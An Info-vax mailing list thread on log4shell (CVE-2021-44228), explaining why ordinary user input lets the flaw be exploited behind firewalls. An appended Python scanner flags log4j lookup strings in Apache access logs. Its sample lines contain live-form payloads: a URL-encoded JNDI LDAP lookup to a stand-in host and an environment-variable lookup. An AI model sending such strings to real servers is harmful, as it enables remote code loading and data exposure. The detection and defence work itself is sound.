[Info-vax] Java, log4j, log4shell, and OpenVMS: CVE-2021-44228
David Turner
dturner at islandco.com
Wed Dec 15 12:51:26 EST 2021
I wonder if there is anything that can be done in the .htaccess file.
I have most countries outside of our business realm blocked so they
cannot even connect to the website.
Since these attempts are typically made by a few malicious players in a
few countries, blocking access via country and IP has really helped us.
On 12/15/2021 10:22 AM, Arne Vajhøj wrote:
> On 12/14/2021 10:06 PM, David Turner wrote:
>> So the vulnerability is there. How would one take advantage of it
>> anyway?
>> Wouldn't you need a privileged account to even get into the server to
>> start taking advantage of the flaws?
>> Assuming one is pretty careful about access to the network, and the
>> directory permissions are controlled, wouldn't it be hard to get to
>> do any damage?
>>
>> Curious as I cannot find much information outside of the warning. I
>> guess no one wants to give hackers the keys to the rolls....
>
> The vulnerability is in the processing of log messages in
> a logging framework.
>
> To exploit the attackers need to get a specific message
> logged.
>
> And that is usually pretty easy. The primary purpose of logging
> is to help troubleshooting problems and to do that it makes sense
> to log user input.
>
> It does not matter how the user input comes into the system.
>
> The two most common ways are probably:
> * web service calls coming in from the internet
> * web form post coming in from internet
>
> But it could also be an insider instead of internet.
>
> And it could be plain socket or a message queue or a file
> instead of HTTP(S).
>
> Because the problem is in the data content, then traditional
> isolation often doesn't help.
>
> --firewall--Java web service with log4j
>
> --firewall--Apache httpd proxy--firewall--Java web service with log4j
>
> --firewall--Apache httpd proxy--firewall--PHP web service--message
> queue--Java backend with log4j
>
> --firewall--Apache httpd proxy--firewall--PHP web
> service--database--Python job--message queue--Java backend with log4j
>
> does not make a difference if that Java code calls log4j with
> user input with malicious content then bad things can happen.
>
> To move on with the exploit the Java code needs to be able to
> reach a server controlled by the attacker, but many places
> only have strict control of inbound traffic, not outbound traffic.
>
> And the Java code needs to have access to something. But if the
> code is intended to do something on behalf of the user then it
> obviously needs to have access to user data. That it may not have
> access to modify the OS does not stop bad things from happening.
>
> Arne
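The thread above makes two points a defender can act on: the dangerous data arrives as ordinary user input (request path, headers, form fields) before it ever reaches the Java backend, and the proxy in front of that backend is the layer David already controls with .htaccess rules. The following is an added example, not code from the original thread or from any project mentioned in it. It scans Apache combined-format access log lines from such a proxy and flags every user-controlled field that carries log4j-style lookup syntax. It brace-matches any `${...}` token rather than searching for one literal string, because lookups can nest and a literal match would miss those, and it percent-decodes the request line first because the same token can arrive URL-encoded. The sample lines, the addresses (RFC 5737 documentation ranges) and the lookup strings in them are constructed for the example; the field names `request`, `referer` and `agent` are this example's own labels.

```python
import re
from dataclasses import dataclass
from typing import List
from urllib.parse import unquote

# Constructed sample access log lines (Apache combined format); nothing here is
# taken from the thread. Line 2 carries a URL-encoded lookup in the request
# path, line 3 carries a lookup in the User-Agent header, line 4 contains a
# harmless "$" to show that a bare dollar sign is not flagged.
SAMPLE_LINES = [
    '192.0.2.10 - - [15/Dec/2021:10:22:01 -0500] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [15/Dec/2021:10:22:03 -0500] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 200 12 "-" "curl/7.79"',
    '203.0.113.9 - - [15/Dec/2021:10:22:05 -0500] "GET / HTTP/1.1" 200 512 "-" "${env:HOSTNAME}"',
    '192.0.2.11 - - [15/Dec/2021:10:22:07 -0500] "GET /price?item=%245%20total HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
]

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "agent"
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# The three fields of a combined-format line that the client fully controls.
USER_CONTROLLED = ("request", "referer", "agent")


def find_lookups(text: str) -> List[str]:
    """Return every top-level ${...} token in text, nested braces included.

    A brace-depth walk is used instead of a fixed regex so that a lookup
    wrapped inside another lookup is still returned as one token. An
    unterminated "${" is returned as-is: it is still not normal user input.
    """
    found: List[str] = []
    i = 0
    while i < len(text):
        if not text.startswith("${", i):
            i += 1
            continue
        depth = 0
        j = i
        while j < len(text):
            if text.startswith("${", j):
                depth += 1
                j += 2
                continue
            if text[j] == "}":
                depth -= 1
                if depth == 0:
                    found.append(text[i:j + 1])
                    break
            j += 1
        else:
            found.append(text[i:])  # ran off the end: unterminated lookup
        i = j + 1
    return found


@dataclass
class Finding:
    ip: str          # client address from the log line
    source: str      # which user-controlled field carried the lookup
    lookups: List[str]


def scan_access_log(lines: List[str]) -> List[Finding]:
    """Percent-decode each user-controlled field and report lookup tokens."""
    findings: List[Finding] = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue  # not combined format; a real deployment would log this
        for name in USER_CONTROLLED:
            hits = find_lookups(unquote(m.group(name)))
            if hits:
                findings.append(Finding(m.group("ip"), name, hits))
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LINES):
        print(f"{f.ip} {f.source}: {f.lookups}")
```

Run against the constructed lines this reports two findings, both from 203.0.113.9: the decoded request path and the User-Agent header. The benign lines, including the one with a literal "$5", produce nothing. This is a detection aid at the proxy, not a fix: as Arne points out, the same content can reach the backend through a message queue, a file or an insider, so the actual mitigation is patching log4j on the Java side, with egress filtering from the backend as the second layer he alludes to when he notes that outbound traffic is rarely controlled as strictly as inbound.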